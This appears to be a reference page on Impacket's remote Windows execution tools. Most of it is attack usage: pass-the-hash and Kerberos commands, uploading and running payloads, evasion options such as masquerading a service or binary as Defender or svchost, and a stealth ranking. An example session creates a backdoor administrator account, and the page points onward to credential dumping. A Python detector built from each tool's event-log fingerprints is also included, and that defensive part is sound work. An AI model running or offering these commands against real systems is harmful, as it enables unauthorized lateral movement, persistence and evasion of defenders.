Impacket provides multiple methods for executing commands on remote Windows systems, each using different protocols and execution contexts.

Tool Comparison

Tool        | Protocol        | Context | Stealth | Requirements
------------|-----------------|---------|---------|----------------------
psexec.py   | SMB + RemComSvc | SYSTEM  | Low     | Admin, SMB access
smbexec.py  | SMB + Service   | SYSTEM  | Low     | Admin, SMB access
wmiexec.py  | WMI/DCOM        | User    | Medium  | Admin, DCOM ports
dcomexec.py | DCOM Objects    | User    | Medium  | Admin, DCOM ports
atexec.py   | Task Scheduler  | SYSTEM  | Medium  | Admin, Task Scheduler

psexec.py

PsExec-like execution using RemComSvc: uploads the RemCom service binary to a writable share (normally ADMIN$), registers and starts it as a temporary service, and talks to it over a named pipe. Commands run as SYSTEM in a fully interactive shell. The uploaded binary, the service-install event and the named pipe are exactly the artefacts the other tools try to avoid.

Basic Usage

# Password authentication
psexec.py DOMAIN/username:password@target
# If the password contains @ or :, omit it (DOMAIN/username@target) and type it at the
# Password: prompt instead, so it cannot be split as part of the host name

# Pass-the-hash (the LM half may be left empty)
psexec.py DOMAIN/username@target -hashes :NTHASH

# Kerberos authentication (-no-pass: ticket is taken from the ccache in KRB5CCNAME)
psexec.py DOMAIN/username@target -k -no-pass -dc-ip DC_IP

Advanced Options

# Custom service name (blends the 7045 service-install event in with legitimate names;
# the uploaded binary and the RemCom named pipe are still present)
psexec.py domain/user@target -service-name WinDefendSvc

# Custom name for the uploaded binary (default is a random 8-letter name)
psexec.py domain/user@target -remote-binary-name svchost.exe

# Upload a binary and execute it instead of the default shell
psexec.py domain/user@target -c payload.exe

# Upload and execute with arguments (the arguments go in the command position)
psexec.py domain/user@target -c tool.exe "arg1 arg2"

# Custom SMB port
psexec.py domain/user@target -port 8445

# Target IP (when DNS fails)
psexec.py domain/user@hostname -target-ip 10.0.0.5

Example Output

$ psexec.py CORP/admin:P@ssw0rd@10.0.0.50
Impacket v0.12.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.0.0.50.....
[*] Found writable share ADMIN$
[*] Uploading file HjKDpnmR.exe
[*] Opening SVCManager on 10.0.0.50.....
[*] Creating service RemComSvc on 10.0.0.50.....
[*] Starting service RemComSvc.....
[!] Press help for extra shell commands

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
WIN-SERVER01

smbexec.py

Executes commands through a temporary service without uploading a binary: the service's ImagePath is a cmd.exe one-liner that runs the command and redirects its output to a file on a share, which the tool then reads back over SMB. A service is created, started and deleted for every command. In the default SHARE mode the output file lands on a share of the target (C$ unless -share says otherwise); in SERVER mode (-mode SERVER, which needs root locally to bind port 445) the tool runs its own SMB server and has the target write the output there instead, for hosts with no writable share.

Basic Usage

# Read output from a specific share (default is C$)
smbexec.py DOMAIN/user:pass@target -share C$
smbexec.py DOMAIN/user@target -hashes :HASH -share ADMIN$

# Defaults: SHARE mode, output read from C$
smbexec.py DOMAIN/user:pass@target

Characteristics

Advantages

  • No binary upload required
  • Works with any share the account can write to (C$, ADMIN$)
  • SERVER mode for hosts where no share is writable

Disadvantages

  • Generates event logs: one service install (7045) per command, with a cmd.exe one-liner as the ImagePath, plus a temporary execute.bat and output file on the target
  • Commands time out if they run longer than the service start timeout
  • Not fully interactive (one command per round trip)

Example

$ smbexec.py CORP/admin@10.0.0.50 -hashes :8846f7eaee8fb117ad06bdd830b7586c
Impacket v0.12.0 - Copyright 2023 Fortra

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> net user attacker P@ssw0rd! /add
The command completed successfully.

C:\Windows\system32> net localgroup administrators attacker /add
The command completed successfully.

wmiexec.py

Executes commands through WMI: calls Win32_Process.Create over DCOM to spawn cmd.exe with its output redirected to a file on a share (ADMIN$ by default), then reads that file over SMB. Runs as the authenticated user (not SYSTEM) and creates no service or scheduled task, so it leaves fewer event logs. What remains is a process-creation record of cmd.exe spawned by WmiPrvSE.exe with a \\127.0.0.1\ADMIN$\__<timestamp> redirect in its command line, which is a well-known detection signature.

Basic Usage

# Standard authentication
wmiexec.py DOMAIN/user:password@target

# Pass-the-hash
wmiexec.py DOMAIN/user@target -hashes LMHASH:NTHASH

# Kerberos
wmiexec.py DOMAIN/user@target -k -no-pass

Advanced Features

# CMD shell (default)
wmiexec.py domain/user:pass@target

# PowerShell shell
wmiexec.py domain/user:pass@target -shell-type powershell

# Execute a single PowerShell command and exit
wmiexec.py domain/user:pass@target -shell-type powershell "Get-Process"

# Use a specific share for the output file (default ADMIN$)
wmiexec.py domain/user:pass@target -share C$
wmiexec.py domain/user:pass@target -share ADMIN$

# In-shell commands (type help to list them)
# Upload file
C:\> lput /local/file.txt C:\Windows\Temp\file.txt

# Download file (files held open by the OS, such as the live SAM hive, cannot be read this way)
C:\> lget C:\Windows\System32\config\SAM

# Change local directory
C:\> lcd /tmp

Example Session

$ wmiexec.py CORP/admin:P@ssw0rd@10.0.0.50
Impacket v0.12.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\> whoami
corp\admin

C:\> powershell -c "Get-WmiObject Win32_OperatingSystem | Select Caption"
Caption
-------
Microsoft Windows Server 2019 Standard

dcomexec.py

Executes commands through DCOM objects exposed by Windows, each of which offers a method that launches a process. Three objects are supported: ShellWindows (the default), ShellBrowserWindow and MMC20. ShellWindows and ShellBrowserWindow are hosted by explorer.exe, so they need a user interactively logged on to the target and the command runs in that user's session; MMC20 is started on demand in mmc.exe under the authenticating account. As with wmiexec, output is collected over SMB from a file on a share (ADMIN$ by default).

DCOM Objects

# Default object is ShellWindows
dcomexec.py DOMAIN/user:pass@target

# Select another object: ShellBrowserWindow or MMC20
dcomexec.py DOMAIN/user:pass@target -object MMC20

Usage Examples

# Interactive shell with MMC20 (no logged-on user required)
dcomexec.py CORP/admin@10.0.0.50 -hashes :NTHASH -object MMC20

# Single command execution
dcomexec.py CORP/admin:pass@target -object ShellWindows "whoami"

# PowerShell shell
dcomexec.py CORP/admin@target -hashes :HASH -shell-type powershell

# No output mode (nothing is written to or read from the share)
dcomexec.py CORP/admin:pass@target -nooutput "command"

atexec.py

Executes commands via the Task Scheduler (ATSVC/TSCH RPC over SMB): creates a task with a random 8-letter name that runs cmd.exe as SYSTEM with its output redirected to ADMIN$\Temp\<name>.tmp, runs it, deletes it and reads the file back. One command per invocation, no interactive shell. It creates no service, so it is quieter than psexec and smbexec, but task creation and deletion are still logged (Security 4698/4699 when object-access auditing is enabled, plus the TaskScheduler operational log).

Basic Usage

# Execute command and retrieve output
atexec.py DOMAIN/user:password@target "whoami"
atexec.py DOMAIN/user@target -hashes :HASH "ipconfig /all"

Example

$ atexec.py CORP/admin:P@ssw0rd@10.0.0.50 "whoami"
Impacket v0.12.0 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \hKtMjRxL
[*] Running task \hKtMjRxL
[*] Deleting task \hKtMjRxL
[*] Attempting to read ADMIN$\Temp\hKtMjRxL.tmp
nt authority\system

Choosing the Right Tool

Most Stealthy to Least (host artefacts only; every tool still produces a network logon, 4624 type 3, and SMB or DCOM traffic):
  1. wmiexec.py - No service or task; cmd.exe under WmiPrvSE.exe with a loopback ADMIN$ redirect, runs as user
  2. dcomexec.py - Same redirect pattern under mmc.exe or explorer.exe, less commonly monitored
  3. atexec.py - Task creation and deletion logged, runs as SYSTEM
  4. smbexec.py - One service install per command, cmd.exe one-liner as ImagePath
  5. psexec.py - Service install plus uploaded binary and named pipe
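The artefacts that decide this ranking can be turned directly into detection logic. The following Python is an added example written for this page, not code from Impacket or from the original documentation: it classifies flattened Windows event records (System 7045 service installs, Security 4698 scheduled-task creations, Sysmon event 1 process creations) by the default fingerprints of each tool. The field names (event_id, ServiceName, ImagePath, TaskName, TaskContent, ParentImage, CommandLine) are an assumed flattened-record layout, and the sample events are constructed, not captured from a host.

```python
import html
import re

# Host-side fingerprints of the Impacket execution tools, taken from their
# default behaviour.  A custom -service-name or -remote-binary-name defeats
# the name checks, so the shape of the ImagePath / command line is tested too.
#
# wmiexec, dcomexec: cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1
# smbexec:           %COMSPEC% /Q /c echo <cmd> ^> \\127.0.0.1\C$\__output ... execute.bat
LOOPBACK_SHARE = re.compile(r"\\\\127\.0\.0\.1\\(?:ADMIN|C)\$\\__", re.I)
SMBEXEC_IMAGEPATH = re.compile(r"%COMSPEC% /Q /c echo .*\\__output.*execute\.bat", re.I)
# psexec: uploaded RemCom binary with a random 8-letter name under %SYSTEMROOT%
PSEXEC_IMAGEPATH = re.compile(r"^%SYSTEMROOT%\\[A-Za-z]{8}\.exe$", re.I)
# atexec: random 8-letter task name, output written to %windir%\Temp\<name>.tmp
ATEXEC_TASKNAME = re.compile(r"^\\[A-Za-z]{8}$")
ATEXEC_ARGS = re.compile(r"^/C .* > %windir%\\Temp\\[A-Za-z]{8}\.tmp 2>&1$", re.I)
TASK_ARGS_XML = re.compile(r"<Arguments>(.*?)</Arguments>", re.S)


def classify(event):
    """Return the Impacket tools whose fingerprint this event matches.

    `event` is a flat dict (assumed layout) with an integer event_id and the
    relevant fields of a System 7045 (service installed), Security 4698
    (scheduled task created) or Sysmon 1 (process created) record.
    """
    eid = event["event_id"]
    hits = []

    if eid == 7045:
        name = event.get("ServiceName", "")
        path = event.get("ImagePath", "")
        if name == "BTOBTO" or SMBEXEC_IMAGEPATH.search(path):
            hits.append("smbexec")
        elif name == "RemComSvc" or PSEXEC_IMAGEPATH.match(path):
            hits.append("psexec")

    elif eid == 4698:
        m = TASK_ARGS_XML.search(event.get("TaskContent", ""))
        args = html.unescape(m.group(1)) if m else ""
        if ATEXEC_TASKNAME.match(event.get("TaskName", "")) or ATEXEC_ARGS.match(args):
            hits.append("atexec")

    elif eid == 1:
        cmd = event.get("CommandLine", "")
        parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        if LOOPBACK_SHARE.search(cmd):
            if "__output" in cmd:
                hits.append("smbexec")
            elif parent == "wmiprvse.exe":
                hits.append("wmiexec")
            elif parent in ("mmc.exe", "explorer.exe"):
                hits.append("dcomexec")
            else:
                hits.append("impacket-style output redirect")

    return hits


def scan(events):
    """Return (index, hits) for every event that matched at least one tool."""
    flagged = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            flagged.append((i, hits))
    return flagged


# Constructed sample records (not captured from a real host), shaped like the
# fields each log source exposes.
SAMPLE_EVENTS = [
    {"event_id": 7045, "ServiceName": "RemComSvc",
     "ImagePath": r"%SYSTEMROOT%\HjKDpnmR.exe"},
    {"event_id": 7045, "ServiceName": "WinDefendSvc",  # renamed, still smbexec-shaped
     "ImagePath": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1 "
                  r"> %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"event_id": 7045, "ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
    {"event_id": 4698, "TaskName": r"\hKtMjRxL",
     "TaskContent": '<Task><Actions Context="LocalSystem"><Exec><Command>cmd.exe</Command>'
                    '<Arguments>/C whoami &gt; %windir%\\Temp\\hKtMjRxL.tmp 2&gt;&amp;1</Arguments>'
                    '</Exec></Actions></Task>'},
    {"event_id": 1, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.123456 2>&1"},
    {"event_id": 1, "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.5 2>&1"},
    {"event_id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe"'},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

Name checks (RemComSvc, BTOBTO, the random 8-letter names) are defeated by -service-name, -remote-binary-name and similar options, which is why the shape of the ImagePath and command line is matched as well: the \\127.0.0.1\<share>\__ loopback redirect is the durable signal for wmiexec, dcomexec and smbexec, and a cmd.exe one-liner as a service ImagePath is never legitimate.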

Common Issues

Authentication failures

# Verify the credentials work; CrackMapExec/NetExec prints (Pwn3d!) when the account has local admin rights
crackmapexec smb target -u user -p password

# Local (non-domain) account
crackmapexec smb target -u user -p password --local-auth

# Try a different authentication method (pass-the-hash)
tool.py domain/user@target -hashes :NTHASH

Connection failures

# Test SMB connectivity (445)
nc -zv target 445

# Test the RPC endpoint mapper and the dynamic DCOM range (135, 49152-65535)
nmap -p 135,445,49152-65535 target

# Use the IP explicitly when name resolution fails
tool.py domain/user@hostname -target-ip 10.0.0.5

DCOM errors (wmiexec, dcomexec)

# Ensure DCOM is enabled on the target
# Check the firewall allows 135 plus the dynamic RPC range

# Try a different DCOM object
dcomexec.py domain/user@target -object ShellWindows

# Fall back to an SMB-based method
smbexec.py domain/user@target

Next Steps

Credential Dumping

Extract credentials after gaining access

SMB Operations

Browse shares and access files

LDAP Operations

Enumerate and modify Active Directory
